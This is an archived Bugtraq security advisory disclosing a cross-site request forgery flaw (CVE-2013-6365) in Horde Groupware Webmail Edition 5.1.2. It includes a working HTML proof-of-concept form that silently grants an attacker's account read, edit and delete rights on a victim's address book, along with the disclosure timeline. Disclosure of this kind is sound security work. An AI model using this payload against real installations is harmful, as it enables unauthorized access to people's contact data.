[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

CSRF Horde Groupware Web mail Edition

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: CSRF Horde Groupware Web mail Edition
From: m.benetrix@xxxxxxxxxxxxxxx
Date: Sun, 3 Nov 2013 21:19:12 GMT

#############################
Exploit Title : CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/28/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail

#############################
GroupWare Web mail Edition

Horde Groupware Webmail Edition is a free, enterprise ready, browser based 
communication suite. Users can read, send and organize email messages and 
manage and share calendars, contacts, tasks, notes, files, and bookmarks with 
the standards compliant components from the Horde Project

##########################
CSRF Location

Change of permissions functionality was found to miss unique token in the form.


##########################
PoC
<html>

   <body>
     <form action="www.victim.com/horde/services/shares/edit.php"
method="POST">
       <input type="hidden" name="actionID" value="editform" />
       <input type="hidden" name="cid" value="37" />
       <input type="hidden" name="app" value="turba" />
       <input type="hidden" name="owner&#95;input" value="kenedyK" />
       <input type="hidden"
name="u&#95;names&#91;&#124;&#124;new&#95;input&#93;"
value="AttackerUserName" />
       <input type="hidden"
name="u&#95;read&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden"
name="u&#95;edit&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden"
name="u&#95;delete&#91;&#124;&#124;new&#95;input&#93;" value="on" />
       <input type="hidden" name="g&#95;names&#91;&#124;&#124;new&#93;"
value="" />
       <input type="hidden" name="save&#95;and&#95;finish"
value="Save&#32;and&#32;Finish" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>

Preconditions: The attacker must know the owner value which is the victim's 
username, and the ID of the address book. Once he gets them,  he can launch the 
attack.

###########################
CVE identifier

CVE-2013-6365.
##########################
Vendor Notification
10/28/2013 to: the developers. They replied immediately and fixed the problem 
http://bugs.horde.org/ticket/12804
11/04/2013: Disclosure

Prev by Date: XSS and CSRF Horde Groupware Web mail Edition
Next by Date: XADV-2013003 Linux Kernel eCryptfs write_tag_3_packet Heap Buffer Overflow Vulnerability
Previous by thread: XSS and CSRF Horde Groupware Web mail Edition
Next by thread: XADV-2013003 Linux Kernel eCryptfs write_tag_3_packet Heap Buffer Overflow Vulnerability
Index(es):
- Date
- Thread